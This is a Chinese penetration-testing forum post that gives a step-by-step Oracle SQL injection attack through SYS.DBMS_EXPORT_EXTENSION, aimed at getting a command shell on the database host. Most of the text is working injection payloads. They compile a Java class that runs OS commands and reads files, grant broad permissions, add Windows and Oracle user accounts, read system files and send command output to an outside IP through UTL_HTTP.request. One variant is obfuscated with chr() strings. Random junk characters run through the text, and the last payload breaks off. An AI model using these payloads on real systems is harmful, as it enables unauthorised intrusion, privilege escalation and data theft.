找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2714|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 # K* ^, e. i5 [- }( Z
/ n( E3 S0 d9 A: V- A, P
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) , k/ |+ d8 n4 H- i0 ^' u+ y$ V  t
的形式即可。(用" 'a'|| "是为了让语句返回true值) , U& G9 H( g9 J( K  d4 i
语句有点长,可能要用post提交。 1 E) B( k3 l0 K3 x6 q  G
以下是各个步骤:
# [. z( c3 ?' Y3 ]' s1.创建包
6 E' P6 ~. a0 m* }  l通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
5 Q( F6 `. j7 u/ j/xxx.jsp?id=1 and '1'<>'a'||(
  c' r) B# X( c" V' Q. n( f  iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 A2 W8 n  i0 y  X8 {. l) Ecreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(7 r; R/ e1 m5 j3 x; U$ @3 P" x* t) T7 \
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}  W6 a  v% i3 C: ~
}'''';END;'';END;--','SYS',0,'1',0) from dual 9 {/ g3 i4 \. }2 Q2 Q
) ) L# {# p3 V9 R) Y# A- f% `
------------------------
  x* N3 g7 L) z* X, x如果url有长度限制,可以把readFile()函数块去掉,即: ) A6 V! O  I' d3 S2 V" y
/xxx.jsp?id=1 and '1'<>'a'||(
) d& l, O& w& r. r* o2 `1 w  Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( Y- B. @4 l3 n3 L- }; r' ]9 l( I
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(" X+ t6 f- }9 {+ t; G. k
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}1 b' D; N4 Q0 ^( r3 y
}'''';END;'';END;--','SYS',0,'1',0) from dual * y& f! l5 w, N
)
! b# d& ]4 b' h4 W# C/ O" D% A同时把后面步骤 提到的 对readFile()的处理语句去掉。 8 n" P4 o1 K+ Q* _' a: x
------------------------------ 4 f2 z' k3 X8 n) x) ~
2.赋Java权限 2 j, k: ]8 v) s) y9 V4 N: Q* w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual! E1 F6 A; L+ _7 `/ d% i# x2 U
3.创建函数 6 J3 I, Q; o3 O4 F; |
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
( c) A; k6 d; |4 Z7 T$ `, s( B# Ecreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual. e1 p' W7 {3 E! }+ n' v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* C% I" Y, w8 u
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
8 K  k* a  J0 D: `+ u4.赋public执行函数的权限 ( G8 }. ?! n3 z7 z% w2 T0 X1 h
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual5 _4 t8 H5 i- O8 s4 ]. U+ u+ ]2 E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual9 {0 A7 g% M* R8 k6 D
5.测试上面的几步是否成功
7 k/ o7 |8 a- s3 c( Pand '1'<>'11'||(
) A/ l$ w4 d) x( S1 M% X6 f9 A, {  lselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' % l( K* l9 d0 L% z) `- F. M
) / w( J2 b4 |% ]( ]
and '1'<>( ) k7 X% R& o" E$ T
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
) s, y6 P) R& O5 X4 o; Q9 N3 f4 p) , q, A' ~- t# {7 c: G
6.执行命令: ; m, L" m* b: F
/xxx.jsp?id=1 and '1'<>(
1 C6 C# {; s; m6 |select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 9 v7 F8 X$ z6 r" |  M) P/ B7 i' Y* x
9 |1 {( ?% L9 ?, F" m$ L: K7 @8 x
)
7 T4 k0 o- G- h- _8 h- a/xxx.jsp?id=1 and '1'<>(
3 j' n% n$ X, V) j4 m4 Iselect  sys.LinxReadFile('c:/boot.ini') from dual0 D: v: r) }4 u( h" E% D
+ @3 a8 [5 \' u  C. h5 [9 M# Q8 c) D
)& z$ w4 n6 ?$ c
  % R$ o1 s  G$ M& r
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
& l8 I. J, g; S4 }. ]: ?如果要查看运行结果可以用 union :
$ i+ Z8 d4 O: L* Q/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
. J2 [  H% W' d% q: V, c- \! `9 I或者UTL_HTTP.request(:
/ L* n: T: c: L: N3 Q+ D/xxx.jsp?id=1 and '1'<>(
6 `' T( v0 h* `$ ZSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
1 X1 y3 B8 n  D- I1 u% F* m" T/ ]) 4 _1 u+ @+ D1 p, L' T1 v4 j
/xxx.jsp?id=1 and '1'<>(
* y" r0 w8 e( [; r5 [SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
% j* y7 o: Z7 k) h( F, U) 4 f9 @- O% R' p6 T4 c/ u
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。( n( A" i9 C: D3 R# ]8 B, {
-------------------- % |4 Y0 V) P$ O1 }
6.内部变化
% J+ f! y/ a* l7 P  b( T8 Y- J通过以下命令可以查看all_objects表达改变: : t: M7 V; u6 ?8 v% C5 N& {
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'- O6 e- @8 Z6 ]
7.删除我们创建的函数 ; v. f' k: ^/ v& b9 V
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- J% V$ Q7 t% m* Bdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 0 u1 ^: W8 [. v9 n( W
====================================================   h5 z7 W2 J0 l4 [
全文结束。谨以此文赠与我的朋友。 # P( L' q; P2 Y* H# j) R
linx : R" m7 a7 A5 O: o, g1 L* T5 @
124829445
9 y5 Q- L/ {0 s6 E1 @, v( d2008.1.12
) M$ f; D. e  }$ d% ]linyujian@bjfu.edu.cn
8 P: Q9 ]. b5 R5 I0 S====================================================================== " I$ m3 `" J1 F. B/ _7 W# D) Z. L
测试漏洞的另一方法:
! ^* E+ {& T6 Z1 a# f9 h创建oracle帐号:
! s; l: A0 T' s" vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 Q& L! }0 ~! P$ i
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
) Z" i% ^5 @2 \! t& c' {4 |即: 2 r4 E2 _; Z) D$ R8 z+ F' _
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),* {* B% ?4 _) ~6 P( l" u4 ?) z
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual # [: k3 ?- Y" t; w$ c
确定漏洞存在: 7 X/ Z8 F6 v7 E" P1 z
1<>(
- D- j8 V2 [9 x- H" sselect user_id from all_users where username='LINXSQL'
+ I0 x# I1 j# a6 _/ S" W2 F) U4 M)
2 N3 O0 C  `4 E" r1 @给linxsql连接权限:
, g. ~) V0 l4 D- t( j7 D  i- `3 Tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 m  i5 ]5 A& W! \2 a: g
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
0 G8 ~- Q2 O, a# _+ a+ }删除帐号:
4 {  g3 E9 o( c( w4 k. h# i( Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 b6 F( Z- F3 m) Q) S2 F
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual ( A6 h' R8 w- G7 D! @  |
====================== / F0 ^. F3 X7 t: X( N
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
+ l+ y; A( c& A& C0 g1.jsp?id=1 and '1'<>(
& R. T+ }8 K# b( R) p( s* s! Nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 h. U" ]2 s% j0 {7 V4 B; Y
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
( ~( r* Q0 I/ D" e# O% h; E' \) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE# i' i- G4 R- F: o
 )
! l6 Y0 u( o, }4 h" E: C
  ?! {( A" a8 S9 r; c/ a7 v8 _" {4 |! A2 N
: c5 w. E7 l. A( X+ H& f; b
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表